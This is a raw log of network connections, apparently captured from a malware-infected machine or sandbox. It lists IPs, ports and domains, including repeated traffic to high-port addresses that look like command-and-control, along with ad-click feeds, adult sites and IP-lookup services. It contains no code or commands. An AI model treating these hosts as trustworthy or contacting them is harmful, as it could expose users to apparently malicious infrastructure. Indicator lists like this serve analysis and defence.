IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 xml.adxnexus.com udp
US 174.137.133.17:80 xml.adxnexus.com tcp
US 104.192.169.138:80 own5.labaz.vip tcp
US 192.133.142.140:80 192.133.142.140 tcp
US 104.192.169.138:80 own5.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.192.170.110:80 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.192.170.110:80 own6.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 cdn.lifetravel.media udp
DE 88.99.102.85:443 cdn.lifetravel.media tcp
US 8.8.8.8:53 cdn.lifetravel.media udp
DE 88.99.102.85:443 cdn.lifetravel.media tcp
IN 139.59.89.245:31373 tcp
US 192.133.142.140:80 192.133.142.140 tcp
US 104.192.169.138:80 own5.labaz.vip tcp
US 8.8.8.8:53 start-xyz.com udp
US 104.21.74.128:443 start-xyz.com tcp
US 8.8.8.8:53 www.webcamsex.nl udp
LU 91.237.218.76:443 www.webcamsex.nl tcp
US 8.8.8.8:53 rotabol.com udp
US 162.252.21.18:443 rotabol.com tcp
US 104.192.169.138:80 tcp
US 8.8.8.8:53 in.spicytalks.com udp
US 8.8.8.8:53 xml.flairadscpc.com udp
US 174.137.133.18:80 xml.flairadscpc.com tcp
US 104.21.91.251:443 in.spicytalks.com tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.192.169.138:80 own5.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 cdn.lifetravel.media udp
DE 88.99.102.85:443 cdn.lifetravel.media tcp
US 8.8.8.8:53 cdn.lifetravel.media udp
DE 88.99.102.85:443 cdn.lifetravel.media tcp
US 8.8.8.8:53 xml.admeridianads.com udp
IN 139.59.89.245:31373 tcp
US 173.239.53.16:80 xml.admeridianads.com tcp
US 8.8.8.8:53 srv4.rtb.me udp
US 209.127.187.251:443 srv4.rtb.me tcp
US 8.8.8.8:53 schtabsdtr.com udp
US 35.226.116.123:443 schtabsdtr.com tcp
US 8.8.8.8:53 www.thereciperepository.com udp
US 66.33.193.202:80 www.thereciperepository.com tcp
US 8.8.8.8:53 cdn.lifetravel.media udp
DE 88.99.102.85:443 cdn.lifetravel.media tcp
US 8.8.8.8:53 abc1.feed-xml.com udp
US 8.8.8.8:53 platformstaticcdn.website udp
DE 188.34.154.91:443 platformstaticcdn.website tcp
US 67.220.182.170:443 abc1.feed-xml.com tcp
US 104.192.169.138:80 own5.labaz.vip tcp
US 8.8.8.8:53 xml.leoyard.com udp
US 198.134.116.18:80 xml.leoyard.com tcp
US 104.26.4.25:443 www.tigerscroll.com tcp
US 8.8.8.8:53 goto.riseofthetide.xyz udp
US 192.133.142.140:80 192.133.142.140 tcp
US 8.8.8.8:53 cdn.lifetravel.media udp
DE 88.99.102.85:443 cdn.lifetravel.media tcp
US 198.134.116.30:80 goto.riseofthetide.xyz tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.192.169.138:80 own5.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.192.169.138:80 own5.labaz.vip tcp
US 216.172.61.20:80 216.172.61.20 tcp
US 8.8.8.8:53 c.mylot.com udp
US 52.5.250.214:80 c.mylot.com tcp
US 8.8.8.8:53 furricity-nursubaru.xyz udp
US 8.8.8.8:53 r-us.tsyndicate.com udp
US 66.242.13.2:443 r-us.tsyndicate.com tcp
US 104.192.169.138:80 own5.labaz.vip tcp
US 8.8.8.8:53 webcamsex.images-dnxlive.com udp
US 8.8.8.8:53 rdr.ad-score.com udp
US 8.8.8.8:53 stm.qoijertneio.com udp
US 130.211.115.4:443 rdr.ad-score.com tcp
NL 185.14.111.23:443 stm.qoijertneio.com tcp
LU 91.237.218.75:443 webcamsex.images-dnxlive.com tcp
US 3.225.140.174:443 furricity-nursubaru.xyz tcp
IN 139.59.89.245:31373 tcp
UA 77.123.139.190:443 api.2ip.ua tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 216.172.61.20:80 216.172.61.20 tcp
US 198.134.116.18:80 xml.leoyard.com tcp
US 8.8.8.8:53 secure.gravatar.com udp
US 192.0.73.2:443 secure.gravatar.com tcp
IN 139.59.89.245:31373 tcp
DE 88.99.102.85:443 cdn.lifetravel.media tcp
US 8.8.8.8:53 cdn.lifetravel.media udp
US 8.8.8.8:53 cdn.lifetravel.media udp
DE 88.99.102.85:443 cdn.lifetravel.media tcp
DE 88.99.102.85:443 cdn.lifetravel.media tcp
US 104.192.169.138:80 own5.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 xml.clickmenia.com udp
US 174.137.133.17:80 xml.clickmenia.com tcp
US 104.192.169.138:80 own5.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 www.thereciperepository.com udp
US 8.8.8.8:53 www.thereciperepository.com udp
US 66.33.193.202:80 www.thereciperepository.com tcp
US 66.33.193.202:80 www.thereciperepository.com tcp
US 8.8.8.8:53 www.thereciperepository.com udp
US 66.33.193.202:80 www.thereciperepository.com tcp
US 8.8.8.8:53 www.thereciperepository.com udp
US 66.33.193.202:80 www.thereciperepository.com tcp
US 104.192.169.138:80 own5.labaz.vip tcp
US 8.8.8.8:53 www.thereciperepository.com udp
US 66.33.193.202:80 www.thereciperepository.com tcp
NL 142.250.179.138:80 fonts.googleapis.com tcp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 104.18.11.207:80 maxcdn.bootstrapcdn.com tcp
US 8.8.8.8:53 www.thereciperepository.com udp
US 66.33.193.202:80 www.thereciperepository.com tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 adro.pro udp
US 52.21.78.9:80 adro.pro tcp
US 8.8.8.8:53 click.junmediadirect.com udp
US 198.134.116.18:80 click.junmediadirect.com tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 174.137.133.17:80 xml.clickmenia.com tcp
US 104.192.169.138:80 own5.labaz.vip tcp
US 8.8.8.8:53 uuid-a.akamaihd.net udp
FR 2.22.22.155:443 uuid-a.akamaihd.net tcp
US 8.8.8.8:53 js.ad-score.com udp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
NL 65.9.83.21:443 js.ad-score.com tcp
US 104.192.169.138:80 own5.labaz.vip tcp
US 8.8.8.8:53 bongacams.com udp
CZ 195.85.23.88:80 bongacams.com tcp
IN 139.59.89.245:31373 tcp
US 104.192.169.138:80 own5.labaz.vip tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 c.ewoss.com udp
US 52.72.232.140:80 c.ewoss.com tcp
US 104.192.169.138:80 own5.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 trkbc.com udp
NL 94.199.255.192:443 trkbc.com tcp
US 8.8.8.8:53 www.thereciperepository.com udp
US 8.8.8.8:53 www.thereciperepository.com udp
US 66.33.193.202:80 www.thereciperepository.com tcp
US 8.8.8.8:53 www.thereciperepository.com udp
US 66.33.193.202:80 www.thereciperepository.com tcp
IN 139.59.89.245:31373 tcp
US 66.33.193.202:80 www.thereciperepository.com tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 66.33.193.202:80 www.thereciperepository.com tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 www.thereciperepository.com udp
US 66.33.193.202:80 www.thereciperepository.com tcp
US 104.192.169.138:80 own5.labaz.vip tcp
US 8.8.8.8:53 start-xyz.com udp
IN 139.59.89.245:31373 tcp
US 216.172.61.20:80 216.172.61.20 tcp
US 172.67.158.98:443 start-xyz.com tcp
US 8.8.8.8:53 tracking.wpnetwork.eu udp
IN 139.59.89.245:31373 tcp
US 104.17.40.62:443 tracking.wpnetwork.eu tcp
US 104.192.169.138:80 own5.labaz.vip tcp
IN 139.59.89.245:31373 tcp
US 96.43.128.70:80 own2.labaz.vip tcp
IN 139.59.89.245:31373 tcp
US 104.192.169.138:80 own5.labaz.vip tcp
US 8.8.8.8:53 find.cnavigate-now.com udp
IN 139.59.89.245:31373 tcp
NL 65.9.83.99:443 find.cnavigate-now.com tcp
IN 139.59.89.245:31373 tcp
US 216.172.61.20:80 216.172.61.20 tcp
US 216.172.61.20:80 216.172.61.20 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 www.toromclick.com udp
US 159.89.225.89:80 www.toromclick.com tcp
US 216.172.61.20:80 216.172.61.20 tcp
US 216.172.61.20:80 216.172.61.20 tcp
IN 139.59.89.245:31373 tcp
US 104.192.169.138:80 own5.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 216.172.61.20:80 216.172.61.20 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 104.192.169.138:80 own5.labaz.vip tcp
US 96.43.128.70:80 own2.labaz.vip tcp
US 8.8.8.8:53 xml.boffoadsfeeds.com udp
US 174.137.133.18:80 xml.boffoadsfeeds.com tcp
US 104.192.169.138:80 own5.labaz.vip tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 216.172.61.20:80 216.172.61.20 tcp
US 8.8.8.8:53 pop.techdoor.com udp
US 8.8.8.8:53 xml.leoyard.com udp
US 174.137.133.18:80 pop.techdoor.com tcp
US 198.134.116.18:80 xml.leoyard.com tcp
US 8.8.8.8:53 xml.hueadsxml.com udp
US 198.134.116.16:80 xml.hueadsxml.com tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 216.172.61.20:80 216.172.61.20 tcp
US 8.8.8.8:53 xml.leoyard.com udp
US 8.8.8.8:53 www.bing.com udp
US 198.134.116.18:80 xml.leoyard.com tcp
US 216.172.61.20:80 216.172.61.20 tcp
US 104.192.169.138:80 tcp
US 96.43.128.70:80 own2.labaz.vip tcp
US 8.8.8.8:53 uuid-a.akamaihd.net udp
US 8.8.8.8:53 xml.adsbuyclick.com udp
US 174.137.133.17:80 xml.adsbuyclick.com tcp
US 8.8.8.8:53 www.thereciperepository.com udp
US 66.33.193.202:80 www.thereciperepository.com tcp
US 216.172.61.20:80 216.172.61.20 tcp
US 216.172.61.20:80 216.172.61.20 tcp
US 216.172.61.20:80 216.172.61.20 tcp
US 8.8.8.8:53 www.thereciperepository.com udp
US 8.8.8.8:53 xml.leoyard.com udp
US 66.33.193.202:80 www.thereciperepository.com tcp
US 198.134.116.18:80 xml.leoyard.com tcp
US 204.79.197.200:443 www.bing.com tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 c.ewoss.com udp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 52.72.232.140:80 c.ewoss.com tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 bongacams.com udp
FR 2.22.22.155:443 uuid-a.akamaihd.net tcp
CZ 195.85.23.89:443 bongacams.com tcp
IN 139.59.89.245:31373 tcp
US 8.8.8.8:53 xml.adzestocp.com udp
US 174.137.133.18:80 xml.adzestocp.com tcp
US 8.8.8.8:53 xml.reachclicks.net udp
US 174.137.133.17:80 xml.reachclicks.net tcp
US 8.8.8.8:53 filter.hueadsxml.com udp
US 8.8.8.8:53 peech2eecha.com udp
US 216.172.61.20:80 216.172.61.20 tcp
US 54.235.252.227:443 peech2eecha.com tcp
US 198.134.116.16:80 filter.hueadsxml.com tcp
US 8.8.8.8:53 xml.techdoor.com udp
US 8.8.8.8:53 c.ewoss.com udp
US 8.8.8.8:53 c.mylot.com udp
US 8.8.8.8:53 t.searchenhancements.com udp
US 192.133.142.140:80 192.133.142.140 tcp
US 174.137.133.18:80 xml.techdoor.com tcp
US 52.5.250.214:80 c.mylot.com tcp
US 52.72.232.140:80 c.mylot.com tcp
US 104.21.7.23:443 t.searchenhancements.com tcp
US 8.8.8.8:53 xml.reachclicks.net udp
US 174.137.133.17:80 xml.reachclicks.net tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
IN 139.59.89.245:31373 tcp
US 96.43.128.70:80 tcp
US 216.172.61.20:80 tcp
US 216.172.61.20:80 tcp
US 192.133.142.140:80 tcp
US 8.8.8.8:53 adcdnx.com udp
US 172.67.15.80:80 adcdnx.com tcp
US 8.8.8.8:53 p.1ts01.top udp
US 172.67.206.83:80 p.1ts01.top tcp
US 8.8.8.8:53 111.t.keepitpumpin.io udp
FR 212.83.141.61:8080 111.t.keepitpumpin.io tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 payments.homeadvisor.com udp
US 104.18.233.12:443 payments.homeadvisor.com tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 www.yahoo.com udp
IE 87.248.100.216:443 www.yahoo.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 p3a.brave.com udp
US 151.101.2.137:443 p3a.brave.com tcp
US 8.8.8.8:53 static.offertoro.com udp
US 8.8.8.8:53 static.offertoro.com udp
NL 65.9.83.101:443 static.offertoro.com tcp
NL 65.9.83.15:443 static.offertoro.com tcp
US 8.8.8.8:53 marsgenesis.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 76.76.21.21:443 marsgenesis.com tcp
US 157.230.187.97:47656 tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 connect.facebook.net udp
NL 31.13.64.21:443 connect.facebook.net tcp
US 8.8.8.8:53 static.offertoro.com udp
US 157.230.187.97:47656 tcp
NL 65.9.83.15:443 static.offertoro.com tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 lumtest.com udp
US 3.94.40.55:80 lumtest.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.25:443 go-updater.brave.com tcp
US 8.8.8.8:53 connect.facebook.net udp
NL 31.13.64.21:443 connect.facebook.net tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.97:443 go-updater.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 componentupdater.brave.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 151.101.2.137:443 componentupdater.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
US 8.8.8.8:53 p3a.brave.com udp
US 8.8.8.8:53 ads-serve.brave.com udp
US 151.101.2.137:443 ads-serve.brave.com tcp
US 151.101.2.137:443 ads-serve.brave.com tcp
NL 65.9.83.117:443 go-updater.brave.com tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 variations.brave.com udp
NL 65.9.83.9:443 variations.brave.com tcp
US 8.8.8.8:53 ads-serve.brave.com udp
US 151.101.2.137:443 ads-serve.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 8.8.8.8:53 players.brightcove.net udp
US 104.16.18.94:443 cdnjs.cloudflare.com tcp
NL 104.80.225.24:443 players.brightcove.net tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 api.rewards.brave.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 44.237.113.195:443 api.rewards.brave.com tcp
US 3.94.40.55:80 lumtest.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 grant.rewards.brave.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 151.101.2.137:443 grant.rewards.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 lumtest.com udp
US 3.94.40.55:80 lumtest.com tcp
US 8.8.8.8:53 cozeros.com udp
FI 95.217.229.116:80 cozeros.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 variations.brave.com udp
NL 65.9.83.9:443 variations.brave.com tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 api.homeadvisor.com udp
US 208.95.112.1:80 ip-api.com tcp
US 104.16.123.55:443 api.homeadvisor.com tcp
US 8.8.8.8:53 cozeros.com udp
FI 95.217.229.116:80 cozeros.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.117:443 go-updater.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.97:443 go-updater.brave.com tcp
US 8.8.8.8:53 componentupdater.brave.com udp
US 151.101.2.137:443 componentupdater.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 purifydigital.go2affise.com udp
NL 213.227.134.242:443 purifydigital.go2affise.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 api.rewards.brave.com udp
US 44.237.113.195:443 api.rewards.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 purifydigital.go2affise.com udp
NL 213.227.135.227:443 purifydigital.go2affise.com tcp
US 8.8.8.8:53 api.coingecko.com udp
US 104.18.28.120:443 api.coingecko.com tcp
US 8.8.8.8:53 variations.brave.com udp
NL 65.9.83.54:443 variations.brave.com tcp
US 8.8.8.8:53 api.coingecko.com udp
US 104.18.29.120:443 api.coingecko.com tcp
US 8.8.8.8:53 api.marsgenesis.com udp
US 8.8.8.8:53 grant.rewards.brave.com udp
US 157.230.187.97:47656 tcp
US 151.101.2.137:443 grant.rewards.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 18.205.36.100:443 api.marsgenesis.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 208.95.112.1:80 ip-api.com tcp
US 157.230.187.97:47656 tcp
NL 65.9.83.25:443 go-updater.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.96:443 go-updater.brave.com tcp
US 8.8.8.8:53 variations.brave.com udp
US 157.230.187.97:47656 tcp
NL 65.9.83.54:443 variations.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 lumtest.com udp
US 3.94.72.89:80 lumtest.com tcp
NL 65.9.83.25:443 go-updater.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.25:443 go-updater.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.96:443 go-updater.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.117:443 go-updater.brave.com tcp
US 8.8.8.8:53 api.marsgenesis.com udp
US 18.205.36.100:443 api.marsgenesis.com tcp
US 8.8.8.8:53 api.rewards.brave.com udp
US 8.8.8.8:53 componentupdater.brave.com udp
US 8.8.8.8:53 grant.rewards.brave.com udp
US 151.101.2.137:443 grant.rewards.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 44.237.113.195:443 api.rewards.brave.com tcp
US 151.101.2.137:443 grant.rewards.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 365shoppingdays.com udp
US 104.21.46.118:443 365shoppingdays.com tcp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 8.8.8.8:53 ads-serve.brave.com udp
US 151.101.2.137:443 ads-serve.brave.com tcp
US 8.8.8.8:53 componentupdater.brave.com udp
US 151.101.2.137:443 componentupdater.brave.com tcp
US 8.8.8.8:53 api.rewards.brave.com udp
US 44.237.113.195:443 api.rewards.brave.com tcp
US 8.8.8.8:53 ads-static.brave.com udp
NL 65.9.83.119:443 ads-static.brave.com tcp
US 8.8.8.8:53 api.marsgenesis.com udp
US 18.205.36.100:443 api.marsgenesis.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.25:443 go-updater.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.96:443 go-updater.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.25:443 go-updater.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
US 8.8.8.8:53 go-updater.brave.com udp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.25:443 go-updater.brave.com tcp
NL 65.9.83.25:443 go-updater.brave.com tcp
NL 65.9.83.25:443 go-updater.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 365shoppingdays.com udp
US 172.67.168.120:443 365shoppingdays.com tcp
NL 65.9.83.117:443 go-updater.brave.com tcp
US 8.8.8.8:53 api.marsgenesis.com udp
US 8.8.8.8:53 grant.rewards.brave.com udp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.25:443 go-updater.brave.com tcp
US 151.101.2.137:443 grant.rewards.brave.com tcp
NL 65.9.83.96:443 go-updater.brave.com tcp
US 18.205.36.100:443 api.marsgenesis.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.96:443 go-updater.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 fernandomayol.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
NL 65.9.83.97:443 go-updater.brave.com tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 variations.brave.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
NL 65.9.83.54:443 variations.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.96:443 go-updater.brave.com tcp
US 8.8.8.8:53 variations.brave.com udp
NL 65.9.83.54:443 variations.brave.com tcp
US 8.8.8.8:53 lumtest.com udp
US 3.94.72.89:80 lumtest.com tcp
US 151.101.2.137:443 grant.rewards.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
US 8.8.8.8:53 ads-serve.brave.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
NL 65.9.83.96:443 go-updater.brave.com tcp
US 157.230.187.97:47656 tcp
US 151.101.2.137:443 ads-serve.brave.com tcp
KR 110.14.121.123:80 fernandomayol.com tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.25:443 go-updater.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.96:443 go-updater.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
NL 65.9.83.97:443 go-updater.brave.com tcp
US 8.8.8.8:53 componentupdater.brave.com udp
US 151.101.2.137:443 componentupdater.brave.com tcp
US 8.8.8.8:53 ads-static.brave.com udp
NL 65.9.83.119:443 ads-static.brave.com tcp
US 8.8.8.8:53 api.rewards.brave.com udp
US 54.70.101.211:443 api.rewards.brave.com tcp
US 8.8.8.8:53 grant.rewards.brave.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 151.101.2.137:443 grant.rewards.brave.com tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 variations.brave.com udp
NL 65.9.83.54:443 variations.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
US 8.8.8.8:53 componentupdater.brave.com udp
NL 65.9.83.97:443 go-updater.brave.com tcp
US 8.8.8.8:53 componentupdater.brave.com udp
US 151.101.2.137:443 componentupdater.brave.com tcp
US 151.101.2.137:443 componentupdater.brave.com tcp
NL 65.9.83.25:443 go-updater.brave.com tcp
US 8.8.8.8:53 go-updater.brave.com udp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 157.230.187.97:47656 tcp
US 8.8.8.8:53 api.rewards.brave.com udp
NL 65.9.83.25:443 go-updater.brave.com tcp
US 157.230.187.97:47656 tcp
